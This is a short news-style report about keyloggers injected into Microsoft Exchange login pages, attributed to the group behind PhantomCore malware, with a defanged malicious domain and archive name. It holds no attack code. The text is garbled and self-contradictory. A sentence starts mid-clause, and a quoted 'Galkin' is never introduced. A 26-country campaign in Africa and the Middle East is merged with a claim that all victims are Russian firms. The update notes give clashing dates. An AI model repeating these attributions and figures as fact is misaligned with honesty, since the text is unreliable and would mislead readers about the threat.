According to a Russian cybersecurity vendor, the attacks have targeted 65 victims across 26 countries. The attack chains entail inserting keylogger code into the login page by taking advantage of known vulnerabilities in Microsoft Exchange Server. An external network can access the file that contains the stolen data.

The perpetrator of these attacks, which were initially reported in May 2024 as targeting organizations in Africa and the Middle East, is currently unknown. analysis published on August 15, 2025, Positive Technologies attributed the keyloggers to the eponymous hacking group behind the PhantomCore malware. The evaluation is predicated on an examination of the attacker's infrastructure, which includes a password-protected archive named "archiveCalculatorVyplatSetup_1.0.6.zip" hosted on the domain "voen-pravo[.]online." The file contains an application that simulates a payment calculator and was created with the Qt framework.

According to Galkin, "ten victims have been identified in recent months, on whose servers there is a previously considered Exchange keylogger." He stated, "All victims are Russian businesses involved in either IT consulting or IT solution development." He stated that "the number of victims is growing" and that more than 5,000 accounts have been gathered from victim systems. (This story was updated to include attribution information after publication on August 18,

2025).

On August 17, 2025, it was also updated to remove a reference to the Russian government as the keyloggers' source and to include attribution information for a few victims. The attribution details, the number of victim systems, and the date of the alleged attacks have all been added to the story. Additionally, it has been updated to reflect that the victims are Russian, not Russian-based.